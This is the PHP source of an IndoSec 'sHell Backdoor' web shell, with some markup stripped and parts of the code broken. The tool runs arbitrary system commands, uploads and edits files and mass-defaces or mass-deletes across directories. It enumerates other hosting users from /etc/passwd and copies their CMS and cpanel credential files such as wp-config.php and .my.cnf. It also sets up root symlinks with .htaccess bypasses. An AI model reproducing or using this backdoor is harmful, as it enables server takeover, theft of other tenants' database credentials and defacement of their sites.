{ INDOSEC }

sHell Backdoor

Please Login

Copyright 2019 @ { IndoSec } ".$perm.''; } else { return "".$perm.''; } } function r($dir, $perm) { if (!is_readable($dir)) { return ''.$perm.''; } else { return ''.$perm.''; } } function exe($cmd) { if (function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists('exec')) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function perms($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 
'T' : '-')); return $info; } if (isset($_GET['dir'])) { $dir = $_GET['dir']; chdir($dir); } else { $dir = getcwd(); } $os = php_uname(); $ip = gethostbyname(gethostname()); $ver = phpversion(); $web = $_SERVER['HTTP_HOST']; $sof = $_SERVER['SERVER_SOFTWARE']; $dir = str_replace('\\', '/', $dir); $scdir = explode('/', $dir); $mysql = (function_exists('mysqli_connect')) ? 'ON' : 'OFF'; $curl = (function_exists('curl_version')) ? 'ON' : 'OFF'; $mail = (function_exists('mail')) ? 'ON' : 'OFF'; $total = disk_total_space($dir); $free = disk_free_space($dir); $pers = (int) ($free / $total * 100); $ds = @ini_get('disable_functions'); $show_ds = (!empty($ds)) ? "$ds" : "NONE"; $imgfol = ""; $imgfile = ""; function formatSize($bytes) { $types = ['B', 'KB', 'MB', 'GB', 'TB']; for ($i = 0; $bytes >= 1024 && $i < (count($types) - 1); $bytes /= 1024, $i++); return round($bytes, 2).' '.$types[$i]; } function ambilKata($param, $kata1, $kata2) { if (strpos($param, $kata1) === false) { return false; } if (strpos($param, $kata2) === false) { return false; } $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } $d0mains = @file('/etc/named.conf', false); if (!$d0mains) { $dom = 'Cant Read [ /etc/named.conf ]'; $GLOBALS['need_to_update_header'] = 'true'; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, 'zone')) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "$count Domain"; } function getsource($url) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); $content = curl_exec($curl); curl_close($curl); return $content; } function bing($dork) { $npage = 1; $npages = 30000; $allLinks = []; $lll = []; while 
($npage <= $npages) { $x = getsource('http://www.bing.com/search?q='.$dork.'&first='.$npage); if ($x) { preg_match_all('#

Swal.fire({ title: '$swa', text: '$text', type: '$swa', }).then((value) => {window.location='?dir=$dir';})"; } function about() { echo '

{ IndoSec }

{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.


'; exit; } function aksiUpload($dir) { echo '

//Multiple Upload

'; if (isset($_POST['upload'])) { $jumlah = count($_FILES['file']['name']); for ($i = 0; $i < $jumlah; $i++) { $filename = $_FILES['file']['name'][$i]; $up = @copy($_FILES['file']['tmp_name'][$i], "$dir/".$filename); } if ($jumlah < 2) { if ($up) { $swa = 'success'; $text = "Berhasil Upload $filename"; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Upload File'; swall($swa, $text, $dir); } } else { $swa = 'success'; $text = "Berhasil Upload $jumlah File"; swall($swa, $text, $dir); } } } function chmodFile($dir, $file, $nfile) { echo "
Chmod File : $nfile
"; if (isset($_POST['perm'])) { if (@chmod($_GET['file'], $_POST['perm'])) { echo 'Change Permission Berhasil
'; } else { echo 'Change Permission Gagal
'; } } } function buatFile($dir, $imgfile) { echo "

$imgfile Buat File :



"; if (isset($_POST['bikin'])) { $name = $_POST['nama_file']; $isi_file = $_POST['isi_file']; foreach ($name as $nama_file) { $handle = @fopen("$nama_file", 'w'); if ($isi_file) { $buat = @fwrite($handle, $isi_file); } else { $buat = $handle; } } if ($buat) { $swa = 'success'; $text = 'Berhasil Membuat File'; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Membuat File'; swall($swa, $text, $dir); } } } function view($dir, $file, $nfile, $imgfile) { echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]

'.$imgfile.' Lihat File : '.$nfile.'
'; $is_image = @getimagesize($file); if (is_array($is_image)) { $source = base64_encode(file_get_contents($file)); echo '

Type: '.$is_image['mime'].' | Size: '.$is_image['0'].' x '.$is_image['1']."

$nfile"; } else { echo '
'; } } function editFile($dir, $file, $nfile, $imgfile) { echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]'; $is_image = @getimagesize($file); echo "
$imgfile Edit File : $nfile
"; if (is_array($is_image)) { echo '
Tidak dapat mengedit gambar
'; } else { echo "
"; } echo '
'; if (isset($_POST['edit_file'])) { $updt = fopen("$file", 'w'); $hasil = fwrite($updt, $_POST['isi']); if ($hasil) { $swa = 'success'; $text = 'Berhasil Update File'; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Update File'; swall($swa, $text, $dir); } } } function renameFile($dir, $file, $nfile, $imgfile) { echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]'; echo "
$imgfile Rename File : $nfile

"; if (isset($_POST['rename_file'])) { $lama = $file; $baru = $_POST['namanew']; rename($baru, $lama); if (file_exists($baru)) { $swa = 'success'; $text = "Nama $baru Telah Digunakan"; swall($swa, $text, $dir); } else { if (rename($lama, $baru)) { $swa = 'success'; $text = "Berhasil Mengganti Nama Menjadi $baru"; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Mengganti Nama'; swall($swa, $text, $dir); } } } } function hapusFile($dir, $file, $nfile) { echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]'; echo "

Yakin Menghapus : $nfile

Tidak
"; if ($_POST['ya']) { if (unlink($file)) { $swa = 'success'; $text = 'Berhasil Menghapus File'; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Menghapus File'; swall($swa, $text, $dir); } } } function chmodFolder($dir, $ndir) { echo "
Chmod Folder : $ndir
"; if (isset($_POST['chmo'])) { if (@chmod($dir.'/'.$ndir, $_POST['perm'])) { echo 'Change Permission Berhasil
'; } else { echo 'Change Permission Gagal
'; } } } function buatFolder($dir, $imgfol) { echo "
$imgfol Buat Folder :

"; if (isset($_POST['buat'])) { $nama = $_POST['nama_folder']; foreach ($nama as $nama_folder) { $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_folder); $fd = @mkdir($folder); } if ($fd) { $swa = 'success'; $text = 'Berhasil Membuat Folder'; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Membuat Folder'; swall($swa, $text, $dir); } } } function renameFolder($dir, $ndir, $imgfol) { $target = $dir.'/'.$ndir; echo "[ Rename ] [ Delete ]
$imgfol Rename Folder : $ndir


"; if (isset($_POST['ganti'])) { $baru = htmlspecialchars($_POST['namanew']); $ubah = rename($target, ''.$dir.'/'.$baru.''); if ($ubah) { $swa = 'success'; $text = 'Berhasil Mengganti Nama'; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Gagal Mengganti Nama'; swall($swa, $text, $dir); } } } function deleteFolder($dir, $ndir) { $target = $dir.'/'.$ndir; echo "[ Rename ] [ Delete ]

Apakah Yakin Menghapus : $ndir ?

Tidak

"; if ($_POST['ya']) { if (is_dir($target)) { if (is_writable($target)) { @rmdir($target); @exe("rm -rf $target"); @exe("rmdir /s /q $target"); $swa = 'success'; $text = 'Berhasil Menghapus'; swall($swa, $text, $dir); } else { $swa = 'error'; $text = 'Berhasil Menghapus'; swall($swa, $text, $dir); } } } } function aksiMasdef($dir, $file, $imgfol, $imgfile) { function tipe_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if ($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif ($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "Done > $lokasi\n"; file_put_contents($lokasi, $isi_script); $masdef = tipe_massal($dirc, $namafile, $isi_script); } } } } } } function tipe_biasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if ($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif ($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "Done > $dirb/$namafile\n"; file_put_contents($lokasi, $isi_script); } } } } } } if ($_POST['start']) { echo "[ Kembali ]
'; } else { echo "
Tipe :
$imgfol Lokasi :

$imgfile Nama File :

$imgfile Isi File :

"; } exit; } function aksiMasdel($dir, $file, $imgfol, $imgfile) { function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if ($dirb === '.') { if (file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif ($dirb === '..') { if (file_exists(''.dirname($dir)."/$namafile")) { unlink(''.dirname($dir)."/$namafile"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if ($lokasi) { echo "$lokasi > Terhapus\n"; unlink($lokasi); $massdel = hapus_massal($dirc, $namafile); } } } } } } } if ($_POST['start']) { echo "[ Kembali ]
'; } else { echo "
$imgfol Lokasi :

$imgfile Nama File :

"; } exit; } function aksiJump($dir, $file, $ip) { $i = 0; echo "
"; if (preg_match('/hsphere/', $dir)) { $urls = explode("\r\n", $_POST['url']); if (isset($_POST['jump'])) { echo '
';
            foreach ($urls as $url) {
                $url = str_replace(['http://', 'www.'], '', strtolower($url));
                $etc = '/etc/passwd';
                $f = fopen($etc, 'r');
                while ($gets = fgets($f)) {
                    $pecah = explode(':', $gets);
                    $user = $pecah[0];
                    $dir_user = "/hsphere/local/home/$user";
                    if (is_dir($dir_user) === true) {
                        $url_user = $dir_user.'/'.$url;
                        if (is_readable($url_user)) {
                            $i++;
                            $jrw = "[R] $url_user";
                            if (is_writable($url_user)) {
                                $jrw = "[RW] $url_user";
                            }
                            echo $jrw.'
'; } } } } if (!$i == 0) { echo "
Total ada $i KAMAR di $ip"; } echo '
'; } else { echo '
List Domains:

'; } } elseif (preg_match('/vhosts/', $dir)) { $urls = explode("\r\n", $_POST['url']); if (isset($_POST['jump'])) { echo '
';
            foreach ($urls as $url) {
                $web_vh = "/var/www/vhosts/$url/httpdocs";
                if (is_dir($web_vh) === true) {
                    if (is_readable($web_vh)) {
                        $i++;
                        $jrw = "[R] $web_vh";
                        if (is_writable($web_vh)) {
                            $jrw = "[RW] $web_vh";
                        }
                        echo $jrw.'
'; } } } if (!$i == 0) { echo "
Total ada $i Kamar Di $ip"; } echo '
'; } else { echo '
List Domains:

'; } } else { echo '
';
        $etc = fopen('/etc/passwd', 'r') or die("Can't read /etc/passwd
"); while ($passwd = fgets($etc)) { if ($passwd == '' || !$etc) { echo "Can't read /etc/passwd
"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_jumping); foreach ($user_jumping[1] as $user_pro_jump) { $user_jumping_dir = "/home/$user_pro_jump/public_html"; if (is_readable($user_jumping_dir)) { $i++; $jrw = "[R] $user_jumping_dir"; if (is_writable($user_jumping_dir)) { $jrw = "[RW] $user_jumping_dir"; } echo $jrw; if (function_exists('posix_getpwuid')) { $domain_jump = file_get_contents('/etc/named.conf'); if ($domain_jump == '') { echo ' => ( gabisa ambil nama domain nya )
'; } else { preg_match_all('#/var/named/(.*?).db#', $domain_jump, $domains_jump); foreach ($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_jumping_url = $user_jumping_url['name']; if ($user_jumping_url == $user_pro_jump) { echo " => ( $dj )
"; break; } } } } else { echo '
'; } } } } } if (!$i == 0) { echo "
Total ada $i kamar di $ip"; } echo '
'; } echo '

'; exit; } function aksiConfig($dir, $file) { if ($_POST) { $passwd = $_POST['passwd']; mkdir('indosec_config', 0777); $isi_htc = 'Options allnRequire NonenSatisfy Any'; $htc = fopen('indosec_config/.htaccess', 'w'); fwrite($htc, $isi_htc); preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach ($user_config[1] as $user_con) { $user_config_dir = "/home/$user_con/public_html/"; if (is_readable($user_config_dir)) { $grab_config = [ "/home/$user_con/.my.cnf" => 'cpanel', "/home/$user_con/public_html/config/koneksi.php" => 'Lokomedia', "/home/$user_con/public_html/forum/config.php" => 'phpBB', "/home/$user_con/public_html/sites/default/settings.php" => 'Drupal', "/home/$user_con/public_html/config/settings.inc.php" => 'PrestaShop', "/home/$user_con/public_html/app/etc/local.xml" => 'Magento', "/home/$user_con/public_html/admin/config.php" => 'OpenCart', "/home/$user_con/public_html/application/config/database.php" => 'Ellislab', "/home/$user_con/public_html/vb/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/forum/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/forums/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/cc/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/inc/config.php" => 'MyBB', "/home/$user_con/public_html/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/shop/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/os/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/oscom/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/products/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/cart/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/inc/conf_global.php" => 'IPB', "/home/$user_con/public_html/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/wp/test/wp-config.php" => 'Wordpress', 
"/home/$user_con/public_html/blog/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/beta/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/portal/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/site/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/wp/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/WP/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/news/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/wordpress/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/test/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/demo/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/home/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/v1/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/v2/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/press/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/new/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/blogs/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/configuration.php" => 'Joomla', "/home/$user_con/public_html/blog/configuration.php" => 'Joomla', "/home/$user_con/public_html/submitticket.php" => '^WHMCS', "/home/$user_con/public_html/cms/configuration.php" => 'Joomla', "/home/$user_con/public_html/beta/configuration.php" => 'Joomla', "/home/$user_con/public_html/portal/configuration.php" => 'Joomla', "/home/$user_con/public_html/site/configuration.php" => 'Joomla', "/home/$user_con/public_html/main/configuration.php" => 'Joomla', "/home/$user_con/public_html/home/configuration.php" => 'Joomla', "/home/$user_con/public_html/demo/configuration.php" => 'Joomla', "/home/$user_con/public_html/test/configuration.php" => 'Joomla', "/home/$user_con/public_html/v1/configuration.php" => 'Joomla', "/home/$user_con/public_html/v2/configuration.php" => 'Joomla', "/home/$user_con/public_html/joomla/configuration.php" => 'Joomla', 
"/home/$user_con/public_html/new/configuration.php" => 'Joomla', "/home/$user_con/public_html/WHMCS/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whmcs1/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Whmcs/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whmcs/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whmcs/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/WHMC/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Whmc/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whmc/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/WHM/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Whm/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whm/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/HOST/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Host/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/host/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/SUPPORTES/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Supportes/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/supportes/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/domains/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/domain/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Hosting/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/HOSTING/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/hosting/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CART/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Cart/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/cart/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/ORDER/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Order/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/order/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CLIENT/submitticket.php" => 'WHMCS', 
"/home/$user_con/public_html/Client/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/client/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Clientarea/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/clientarea/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/SUPPORT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Support/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/support/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BILLING/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Billing/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/billing/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BUY/sumitticket.php" => 'WHMCS', "/home/$user_con/public_html/Buy/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/buy/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/MANAGE/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Manage/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/manage/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/ClientSupport/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Clientsupport/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/clientsupport/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CHECKOUT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Checkout/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/checkout/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BILLINGS/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Billings/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/billings/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BASKET/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Basket/submitticket.php" => 'WHMCS', 
"/home/$user_con/public_html/basket/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/SECURE/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Secure/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/secure/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/SALES/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Sales/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/sales/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BILL/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Bill/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/bill/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/PURCHASE/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Purchase/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/purchase/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/ACCOUNT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Account/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/account/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/USER/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/User/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/user/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CLIENTS/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Clients/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/clients/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BILLINGS/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Billings/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/billings/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/MY/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/My/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/my/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/secure/whm/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/secure/whmcs/submitticket.php" => 'WHMCS', 
"/home/$user_con/public_html/panel/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/clientes/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/cliente/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/support/order/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/boxbilling/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/box/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/host/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/Host/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/supportes/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/support/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/hosting/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/cart/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/order/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/client/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/clients/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/cliente/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/clientes/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/billing/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/billings/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/my/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/secure/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/support/order/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/zencart/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/products/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/cart/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/shop/includes/dist-configure.php" => 'Zencart', 
"/home/$user_con/public_html/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/hostbills/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/host/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/Host/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/supportes/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/support/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/hosting/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/cart/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/order/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/client/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/clients/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/cliente/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/clientes/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/billing/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/billings/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/my/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/secure/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/support/order/includes/iso4217.php" => 'Hostbills', ]; foreach ($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if ($ambil_config == '') { } else { $file_config = fopen("indosec_config/$user_con-$nama_config.txt", 'w'); fwrite($file_config, $ambil_config); } } } } echo "

Success Get Config!!

Click Here"; } else { echo "

/etc/passwd error ? Bypass Here


"; } exit; } function aksiBypasswd($dir, $file) { echo '

Bypass etc/passwd With :


Bypass User With :

'; $mail = 'ls /var/mail'; $paswd = '/etc/passwd'; if ($_POST['syst']) { echo"
'; } if ($_POST['passth']) { echo"
'; } if ($_POST['ex']) { echo"
'; } if ($_POST['shex']) { echo"
'; } if ($_POST['melex']) { echo"
'; } if ($_POST['awkuser']) { echo"
'; } if ($_POST['systuser']) { echo"
'; } if ($_POST['passthuser']) { echo"
'; } if ($_POST['exuser']) { echo"
'; } if ($_POST['shexuser']) { echo"
'; } echo '
'; exit; } function aksiAdminer($dir, $file) { $full = str_replace($_SERVER['DOCUMENT_ROOT'], '', $dir); function adminer($url, $isi) { $fp = fopen($isi, 'w'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists('adminer.php')) { echo "Login Adminer"; } else { if (adminer('https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php', 'adminer.php')) { echo "

Berhasil Membuat Adminer

Login Adminer"; } else { echo "

Gagal Membuat Adminer

"; } } exit; } function aksiSym($dir, $file) { $full = str_replace($_SERVER['DOCUMENT_ROOT'], '', $dir); $d0mains = @file('/etc/named.conf'); if (!$d0mains) { die("[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
Error tidak dapat membaca /etc/named.conf

"); } //#htaccess if ($d0mains) { @mkdir('indosec_sym', 0777); @chdir('indosec_sym'); @exe('ln -s / root'); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex indsc.html AddType text/plain php html php5 phtml AddHandler text/plain php html php5 phtml Satisfy Any'; $fp3 = fopen('.htaccess', 'w'); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
"; $dcount = 1; foreach ($d0mains as $d0main) { if (eregi('zone', $d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domains[1][0])); echo '"; flush(); $dcount++; } } } echo '
No. Domains Users symlink
'.$dcount." '.$domains[1][0].' '.$user['name']." Symlink
'; } else { $TEST = @file('/etc/passwd'); if ($TEST) { @mkdir('indosec_sym', 0777); @chdir('indosec_sym'); @exe('ln -s / root'); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex indsc.html AddType text/plain php html php5 phtml AddHandler text/plain php html php5 phtml Satisfy Any'; $fp3 = fopen('.htaccess', 'w'); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
